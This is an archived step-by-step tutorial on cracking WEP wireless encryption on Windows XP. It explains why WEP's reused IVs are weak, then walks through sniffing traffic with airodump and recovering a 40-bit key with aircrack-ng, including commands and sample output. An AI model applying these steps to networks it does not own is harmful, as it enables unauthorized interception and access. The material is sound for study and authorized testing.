TUCoPS :: Networks :: Wireless :: wepcrak.txt

Cracking WEP with Windows XP Pro SP2

Cracking WEP with Windows XP Pro SP2

There is a Video Counterpart to this which is in the format of me
describing what I am doing and how to carry out all the actions in this
paper from start to finish. It will be available as soon as I can secure
my web site adequately and will only ever be available to registered TAZ
members. This paper should be considered the pre-reading for the video

This is part one in a two part paper on Cracking WEP with Windows XP.
This first part covers sniffing wireless traffic and obtaining the WEP
key. Part Two will cover associating with a Wireless AP, spoofing your
MAC address, trying to log on administratively to the AP and further
things you can carry out on the WLAN once authenticated successfully.

What is WEP:

Wired Equivalent Privacy (WEP) is often mistakenly thought of as a
protocol designed to 100% protect wireless traffic, when this is not the
case. As its name suggests it was designed to give wireless traffic the
same level of protection as a wired LAN, which when you think about it
is a very hard thing to set out to do.

LAN's are inherently more secure than Wireless LAN's (WLAN) due to
physical and geographical constraints. For an attacker to sniff data on
a LAN they must have physical access to it - which is obviously easier
to prevent than to prevent access to traffic on a WLAN.

WEP works at the lower layers of the OSI model, layers One and Two to be
exact, so it therefore does not provide total end to end security for
the data transmission.

WEP can provide a level of security between a Wireless Client and an
Access Point or between two wireless clients.

WEP Standards:

WEP is commonly implemented as a 64 bit or 128 bit encryption. These
encryption strengths can sometimes be referred to as 40 bit or 104 bit
due to the fact that each data packet is encrypted with an RC4 cipher
stream which gets generated by an RC4 key. This RC4 key for say a 64 but
WEP implementation is composed of a 40 bit WEP key and a 24 bit
Initialization Vector (IV) - hence the 64 bit RC4 key, however the
actual WEP part of it is only 40 bits long, the IV taking up the other
24 bits, which is why a 64 bit WEP key is sometime referred to as a 40
bit WEP key.

This resultant cipher is `XOR'd' with the plain text data to encrypt the
whole packet. To decrypt the packet the WEP key is used to generate an
identical `key stream' at the other end to decrypt the whole packet but
more about this later on, I will also go over the IV's in more detail
later on as well.

Failures of WEP:

We have heard everyone say WEP is easy to crack and should not be used,
can be cracked in 10 minutes etc but why is this?

Well in my opinion WEP is seriously flawed for the following reasons:

1) Initialization Vectors are reused with encrypted packets. As an IV is
only 24 bits long it is only a matter of time before it is reused.
Couple this with the fact you may have 50 + wireless clients using the
same WEP key and the chances of it being reused improve even further. An
IV is sent in clear along with the encrypted part of the packet. The
reuse of any encryption element is always a fundamental flaw to that
particular encryption and as an IV is sent in clear this further exposes
a significant weakness in WEP.

As more RC4 cipher steams are found and more IV's are deciphered and the
closer we get to discovering the WEP key.

This is what forms the foundation of WEP cracking.

2) The algorithm used to encrypt a WEP `hash' is not intended for
encryption purposes. The original purpose of the Cyclic Redundancy Check
(CRC-32) was to detect errors in transmission, not to encrypt data.

3) The most significant flaw in my opinion is the mass use of the WEP
key. Everything using that particular AP will need the same WEP key
hence all the resultant traffic will be using the exact same WEP key as
well. The one not so obvious side-affect of this is when it comes to
administering the network. If you have 60 wireless clients all using the
same WEP key, do you really want to go and periodially change them
all...it is easier to leave it as it is. I am guilty of doing this on a
network I used to administer a few years ago as I am sure others are who
still use WEP.

Wireless Standards:

The Institute of Electrical and Electronic Engineers (IEEE) defined
specifications for wireless traffic back in 1997. The protocol they came
up with is the 802.11 standard.

Nowadays 802.11 has many different implementations for wireless traffic.
The most common ones are:

1) 802.11 - this specifies that the wireless traffic will use the 2.4GHz
frequency band utilizing either Frequency Hoping Spread Spectrum (FHSS)
or Direct Sequence Spread Spectrum (DSSS). The FHSS is a protocol
whereby the traffic `hops' to pre-defined frequencies and is commonly
used to reduce the effects of noise or interference in the transmission.
DSSS is also a protocol used to reduce noise interference by combining
the signal with a higher data rate bit sequence (commonly called a
chipping code) which separates the data up in to a logical sequence and
attaches a form of CRC to the packet before transmitting.

2) 802.11a - this provides data transmission in the 5GHz band at a rate
of anything up to 54Mbps. Unlike the original 802.11 specification this
uses Orthogonal Frequency Division Multiplexing (OFDM) to encode the
traffic instead of FHSS or DSSS. OFDM is a method of transmitting
digital data by splitting it up in to smaller `chunks' and transmitting
them at the same time but on different frequencies, which is why the
data transfer rate is quite good.

3) 802.11b - came along in 1999 with the intention of allowing wireless
functionality to be similar to that provided by Ethernet. It transmits
data in the 2.4GHz band at 11Mbps using DSSS only. Is sometimes called

4) 802.11g - this works in the 2.4 GHz band at a rate of 20Mbps or more
and came along in 2003. It uses OFDM like 802.11a and transmits data in
a very similar way. However unlike 802.11a it is backward compatible
with 802.11b.

A point worth noting here is if you have an 802.11b Wireless Adaptor you
will not be able to receive 802.11g traffic. If you do want to get in to
WEP cracking it is well worth your while investing in a dual band card.
I will talk about Wireless Adaptors more later on.

How do we crack WEP:

Well cracking WEP is fairly easy to understand if you have followed what
I explained above. We briefly touched on IV's and WEP encryption and how
they tie in together. To put it very simply, if you can decipher the IV
algorithm you can decrypt or extract the WEP key.

As I stated before WEP very kindly transmits the IV in clear, so if we
can run a mathematical equation against it we can find and decipher the
RC4 stream that encrypted the whole packet in the first place.

The WEP `key' is the missing value [key] from this mathematical
equation. Remember the AP or the client has this key to use when
decrypting the packet and is what we must find by running a complicated
algorithm against the encrypted packet.

If you think about it like this it may become clearer:

You have an algorithm that is produced by concatenating a randomly
generated 24 bit IV with your WEP Key - You also have an RC4 Key stream
- the two are then `hashed' together to encrypt the packet.

The IV is the hub of the whole process as this is they only thing that
has used your WEP key. If we run a statistical anyalisis against the IV
to try and decrypt the packet, we can find the key used at the begining
of the process.

When you try to decrypt them, every time you crack a piece of the
algorithm the corresponding plain text part of the packet is revealed,
once the whole packet is decrypted you know the algorithm used to
encrypt that particular packet - A crude way of describing it but as
simple as I can make it.

Any attacker can passively collect encrypted data, after a while due to
the limitations explained earlier; two IV's that are the same will be
collected. If two packets with the same IV are XOR'd, an XOR of the
plain text data can be revealed. This XOR can then be used to infer data
about the contents of the data packets.

The more identical IV's collected the more plain text data can be
revealed. Once all the plain text of a data packet is known, it will
also been known for all data packets using the same IV.

So before any transmission occurs WEP combines the keystream with the
payload using an XOR process, which produces ciphertext (data that has
been encrypted). WEP includes the IV in clear in the first few bytes of
the frame. The receiving AP / Client uses this IV along with the shared
secret key (Your WEP Key) to decrypt the payload of the frame.

XOR is a mathematical algorithm which I am not even going to attempt to
explain. This site explains it very well though:

So in short - the more identical IV's we can get the more plain text
data we can reveal and the closer we get to obtaining the key used to
encrypt the data in the first place.

As it is not pre-determined when we are going to receive identical IV's
it is impossible to say how many IV's need to be collected but more
about that later.

Software Used:

For this attack I am going to use aircrack-ng for Windows which can be
obtained from here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng Whilst
here download cygwin1.dll and paste it in to the same folder as
Aircrack-ng. There is a copy of cygwin1.dll included already but the one
available from the tinyshell site is a later version of it. The peek.dll
and peek5.sys files also need to be in the same directory as aircrack.
They are available here: If you download Winaircrack - which is a GUI
version of what I cover in this paper - copy the peek.dll and peek5.sys
files across to where you have aircrack stored. You will get a peek
driver not found message if you dont do this.

Once it has downloaded you have to option of pasting the directory path
of it in to your Command Prompt path so you can start the application
straight from the command line without having to `CD' to the correct
directory. For example I copied this in to my path: C:\Documents and
Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin In
the bin folder is airodump and aircrack-ng - so now I can just type
airodump straight in to the command prompt to run the application.

To add something to your path:

Right click My Computer > Properties > Advanced > Environment Variables
> Under System Variables highlight PATH > Edit > enter the directory
path using a ; to separate it from any existing entries.

You also need to go to Wild Packets to pick up a new driver for your
card. http://www.wildpackets.com/

I have found that the most common cause of stress when trying to crack
WEP is incompatible hardware. The Airopeek driver from Wild Packets is
not compatible with all types of hardware. There is a list of supported
adaptors and the relevant driver you need to use on the web site.

For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND
adaptor which you can get from HERE for 35.99.

This card works with Whax, Auditor and BackTrack pretty much straight
out of the box. It is also a dual band so you don't have to worry about
sniffing traffic on a `g' WLAN when you have a `b' wireless adaptor. It
is my preferred Wireless Adaptor and has not let me down yet. Most cards
that are Atheros based will have the Atheros logo on the side of the
box, use one of these if possible.

**Some people I know have confused the NETGEAR WG511 which does not
work, with the NETGEAR WG511T which does work so try not to fall in to
this trap**

Cards that I can 100% say to stay away from are ones that use the
PrisimGT chipset. Connexant cards are also a complete waste of time
(which I found out the hardway) so please do not even think about buying
one of these if you want to crack WEP.

See this list to check what chipset your card uses:

So you should now have:

Aircrack-ng Cygwin1.dll - in the same directory as Aircrack Peek.dll and
Peek5.sys in the same directory as Aircrack Relevant Drivers from Wild
Packets for your Adaptor Added aircrack-ng to your PATH Got an Adaptor
that works with all of the above!

So what's next?

Now we need to install the driver you have downloaded. **Warning - the
next procedure will overwrite your existing Windows driver, so make sure
you have the disc or a backup of it before carrying on.**

The peek driver will not let you use your Wireless Adaptor in the
conventional way. You won't be able to associate to an AP with it or
browse the internet etc.

99% of Windows drivers a designed to make your Wireless Adaptor reject
any 802.11 traffic not destined for it. The Peek driver puts your
Adaptor in to a promiscuous mode to allow it to sniff all 802.11 traffic
that is compatible with your adaptor.

To install the driver open up your Device Manager and right click on
your wireless adaptor > Update Driver > Install from a Specific Location
> Don't Search, I will chose the driver to install > Have Disk > Browse
to where you have downloaded the driver > Double Click.

Windows may display a prompt warning you that the driver is not
digitally signed, if ths happens click continue anyway.

Once the driver is installed we are ready to crack WEP.

**If you get an error message saying `The specified destination contains
no information about your device', you have either downloaded the wrong
driver or more likely your Wireless Adaptor is not compatible with what
we need it to do.**

Cracking WEP:

Cracking WEP is by now means a skilful thing to do, as all the hard work
was done by Chris Devine who is the excellent coder of Aircrack, all we
need to do is collect the data and start the program. If you have
questions about Aircrack a good place to post them is on the Netstumbler
Linux Forums as I believe the author checks here quite often.
Alternatively you can email the author at devine [at] iie [dot] cnam
[dot] fr - whether he will reply or not I don't know but I wouldn't have
thought he will appreciate you emailing him with stupid questions - use
the forum for these!


So open a command prompt and type Airodump - or if you have not added it
to your PATH you will need to CD to the right directory.

A new window opens now which will search for all installed wireless
adaptors, give it a numerical signature and display the following:

Code: usage: airodump <nic index> <nic type> <channel(s)> <output
 prefix> [ivs only flag]

 Known network adapters:

 14  NETGEAR WG511T 54 Mbps Wireless PC Card 22  NETGEAR WAG511
 802.11a/b/g Dual Band Wireless PC Card

 Network interface index number  ->

Select the relevant ID for the card you want to use:

Code: Network interface index number  -> 22

You are then prompted to enter the type of chipset of your card: Code:
Interface types:  'o' = HermesI/Realtek 'a' = Aironet/Atheros

  Network interface type (o/a)  ->

We are using an Atheros card so we enter 'a':

Code: Network interface type (o/a)  -> a

Then you are asked what channel you would like it to sniff traffic on:

Code: Channel(s): 1 to 14, 0 = all  ->

The USA only uses up to channel 11 and Europe use up to channel 14.
Channel 11 in the UK is the most common one that wireless AP's default
to however, so I normally start off with channel 11. If you want to scan
all channels use the 0 option.

We shall use channel 11:

Code: Channel(s): 1 to 14, 0 = all  -> 11

Now you are asked what you would like to save your capture file as:

Code: (note: if you specify the same output prefix, airodump will resume
 the capture session by appending data to the existing capture file)

 Output filename prefix        ->

If you specify a file name that you have already used the resulting data
will be added to the file - which is an excellent feature if it becomes
apparent later on that you do not have enough IV's as you won't have to
start all over again!

Code: Output filename prefix        ->WEP1

Now you are asked if you only want to save the IV's or all packets that
are sniffed.

Code: (note: to save space and only store the captured WEP IVs, press
 y.The resulting capture file will only be useful for WEP cracking)

 Only write WEP IVs (y/n)      ->

As we know to crack a WEP key we only need IV's so we can select yes to
this question. The resultant file will be saved as an .IVS file.

Code: Only write WEP IVs (y/n)      -> y

So now we have told it everything it needs to know, let's see what

 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:09:5B:FD:C6:52   10        3        6  11  54  OPN   HOMEWIRELESS
 00:30:F1:F5:A1:35   60      359     1234  11  54  WEP   Stuart

 BSSID              STATION            PWR  Packets  ESSID

 00:09:5B:FD:C6:52  00:09:5B:B6:1D:2A   17        6  HOMEWIRELESS
 00:30:F1:F5:A1:35  00:09:5B:84:A6:DF   87     1793  Stuart

This is the output from a successful Airodump start-up.

BSSID = The MAC address of the Wireless Access Point. PWR = The strength
of the signal being received BEACONS = Every AP transmits around 10
beacons per second - these are not encrypted and are useless to us from
a WEP cracking point of view - they basically say ` I'm an AP, come and
associate with me'. DATA = This is what we are interested in. DATA
packets are our IV's that we need and what we are most interested in.
ENC = Encapsulation - WEP / WPA / OPEN etc - speaks for itself ESSID =
The name of the wireless network. This is not always broadcasted by the
AP but we will need it to associate with the AP later on.

The second part lists any associated clients that are talking to the AP.

Some AP's have MAC address filtering enabled. This is a table of MAC
addresses stored on the AP - when you try to associate with the AP if
MAC filtering is enabled the AP checks your MAC with the list of allowed
MAC's to see if you can associate with it. If it is not in the list,
regardless of if you have the correct WEP key or not, you will not be
allowed to associate with the AP. You will also leave an entry in the
logs. This is a very helpful feature of Airodump that informs us what we
need to spoof our MAC to when associating with the AP.


As I mentioned before it is impossible to give an exact number of IV's
that need to be collected to crack a WEP key. The more we can get the
more chance we have of cracking the WEP key. From trial and error I have
found that I can crack a 40 bit WEP key in a few seconds with around
250,000 - 400,00 IV's. You may be able to do it with more IV's or less
IV's, it is different every time. For a 104 bit WEP key you will need
anything up to 2000000 IV's and maybe even more. The fewest amount of
IV's I have ever been able to use in one of my lessons for a 104 bit
crack is 710,325 and this took just 4 minutes 31 seconds to crack but in
other lessons I have had to collect in excess of 2 million.

This is where the very handy feature of Airodump amending to existing
files is useful. If you have collected 500,000 and run a 64 bit attack
on the file but are unsuccessful, simply start Airodump again and use
the same file name, all the new IV's will be added to the ones you
already have, so you don't have to start from the beginning all over

So now sit there and wait for the amount of IV's that you decide on to
be collected!


So once you have decided you have enough IV's press CTL + C to end
Airodump. I have collected 413,994 IV's for this crack.

You will still have the white command prompt open so just type
Aircrack-ng at the prompt. (Or `CD' to it)

You will now get a list of `usages' for Aircrack that you can use.

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK) -e <essid> :
      target selection: network identifier -b <bssid> : target
      selection: access point's MAC -q         : enable quiet mode (no
      status output) -w <words> : path to a dictionary file

  Static WEP cracking options:

      -c         : search alpha-numeric characters only -t         :
      search binary coded decimal chr only -d <start> : debug - specify
      beginning of the key -m <maddr> : MAC address to filter usable
      packets -n <nbits> : WEP key length: 64 / 128 / 152 / 256 -i
      <index> : WEP key index (1 to 4), default: any -f <fudge> :
      bruteforce fudge factor,  default: 2 -k <korek> : disable one
      attack method  (1 to 17) -x         : do bruteforce the  last two
      keybytes -y         : experimental  single bruteforce mode

  Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe Original work: Christophe
  Devine http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

As this paper is getting a bit long I will just cover the options we
need to crack a WEP key from a file. If you want to try the other
options out..try them and see what you come up with. The helpful
descriptions provided speak for themselves really.

So we have collected 413,994 IV's which is not enough for a 104 bit WEP
crack so we will try a 40 bit WEP crack instead (we can always add IV's
to the file later on if it does not work)

So we issue the following command to Aircrack:

Code: C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs

We use the -n 64 switch to tell it we think it is a 64 bit WEP key.

You can also use the -f switch, which is the fudge factor switch. In the
programmers own words:

"By default, this parameter [fudge factor] is set to 2 for 104-bit WEP
and to 5 for 40-bit WEP. Specify a higher value to increase the brute
force level: cracking will take more time, but with a higher likelihood
of success.

So if you have no joy cracking it you can try again with the -f 5

If you forget what you called the Airodump file it is saved in the
following directory by default:

C:\Documents and Settings\%User Name%

If you selected to only save the IV's it will be an .IVS file, if you
said No and wanted to save everything it will be a .cap file.

Our scan only turned up one network so Aircrack will only crack those
IV's, if you have more than one network you will need to use the -m
switch to tell it the BSSID of the AP whose packets you want to use,

The result of issuing our command is:

Code: Aircrack-ng 0.3

                      [00:00:00] Tested 1231 keys (got 413994 IVs)

   KB    depth   byte(vote) 0    0/  4   A6(  68) 82(  40) EE(  20) E4(
    15) 18(   5) 23(   5) 04(   3) 1    0/  3   22(  75) 52(  19) 43(
    15) 5A(  13) 21(   8) 8A(   5) B2(   4) 2    0/  1   04(  76) 33(
    8) 8B(   5) C8(   5) 47(   0) 62(   0) 63(   0) 3    0/  1   09(
    106) FB(  15) ED(  12) 58(  12) F0(  11) 29(   7) C8(   5) 4    0/
    1   EB( 153) 19(  27) 0E(  15) 38(  15) B8(  13) E0(  10) DC(   9)

                         KEY FOUND! [ A6:22:04:09:EB ]

There you have it our 40 bit WEP key is A6:22:04:09:EB.

With 413994 IV's this key took Aircrack less than 1 second to crack.
Which is an example of how good Aircrack truely is. With 250,000 ish
IV's chances are it would only take a few seconds more to crack but I
like to collect a few more IV's to be on the safe side.

Like I said the programmer has done all the hard work for us, we just
need to tell it what to do. For an end users part WEP cracking is not a
skilful hack in any way whatsoever (we just tell Aircrack what we want
it to do) unless you want to write your own program for it!


Common problems are:

Incompatible Wireless Card.

90% of my students who come to me complaining they can't crack WEP and
that Aircrack does not work are failing because they do not have a
compatible Wireless Adaptor. If you are giving the commands that I am
giving here, or get an error message when installing the driver I can
almost guarantee you that your card is not compatible. It is possible to
flash the firmware of some Prisim2 Cards, this pages helps you do this:

Can't receive DATA / IV's with Airodump:

To receive IV's from an AP there has to be a client associated with it
that is sending / receiving traffic. If you are not receiving IV's the
most likely causes of this are that there is no associated clients or
you are too far away from the AP. As far as I know Aireplay does not
work with Windows so you will have to use a Packet Injection application
of your choosing. I will cover this in Part 2.

Finally, if you are just plain unlucky you may just not be able to crack
the WEP with the IV's you have. If this happens the only option is to
start from the beginning again.

If you cant crack the 64 bit WEP collect more IV's and try doing it as a
104 bit WEP key.

My thanks go to Chris Divine, KoreK and all who helped him, for writing
such a helpful application and to Thomas d'Otreppe who I believe
imported it on to Windows?


The following FAQ has been put together from questions in this thread.
Additionally the following link was found by Moo and has proved very


Can we ask that you look through the FAQ in that link and this FAQ
before you post questions here, thanks

Q. I can't get the Wild Packet drivers to work for my xxxxx wireless
card. After I install it says the card will not work properly now?

A. You won't be able to connect to the internet / AP in the conventional
way after you install the Wild Packet drivers - these drivers place your
card in a promiscuous mode to enable you to receive traffic not destined
for you.

If you fire Airodump up after installing the drivers it should work, if
they have been installed correctly. There are two versions of the
drivers. If it does not work then either the drivers either haven't been
installed properly, you have installed the wrong version, or they are
incompatible with your card.

After you have finished go to your device manager in your control panel
and 'roll back' the driver to revert back to the original one so you can
get normal connectivity.

Q. Can I have two different wireless cards installed, one for general
internet surfing and another with the Wild Packet drivers installed for
penetration testing?

A. Yes, this is a good solution; I do it most of the time when I need
internet connectivity and a passive connection at the same time. If you
have more than one PCMCIA slot on your laptop use the same slot for each
card - this will prevent you having to constantly reinstall the relevant
drivers! ____________________________________________________________

Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll)
failed, make sure this file is present in the current directory." what
does this mean?

A. You will need to get the peek.dll and peek5.sys files and put them in
the same directory as Aircrack.

The easiest way to get them is to go here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Links and download
Winaircrack - which is a GUI version of Aircrack - copy and paste
peek.dll and peek5.sys in to your directory.

You should have added cygwin1.dll, peek.dll and peek5.sys in to your
directory before starting Airodump/Aircrack

Q. When a click on (airdecap-ng,arpforge-ng.....),they quick open and

A. Read all of the paper......specifically the part about adding them to
your path - once you have done this double clicking on the wont work any
more. ____________________________________________________________

Q. I have it running fine, but the IV collection is really slow, can I
speed it up at all?

A. If the wireless network does not have many clients, then IV
collection will be very slow. If this is your own network open up a
command prompt and type:

ping "ip address of AP" -l 65500 -t (That's a small L not a |)

This will send a constant stream of ICMP packets 65500B big to the AP
which should generate a good stream of IV's. This will only work if you
are already associated with the AP and is for use to test YOUR OWN WEP
KEY you cannot use it against somebody elses AP until you have
associated with it.

Q. How do I use Packet Injection to speed up collection of IV's? / I
can't seem to get packet injection program xxxxxx to work properly, can
you help?

A. Unfortunately Packet Injection is outside the scope of this tutorial
and may be covered in a future one. For the time being you will have to
do some research on Google.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH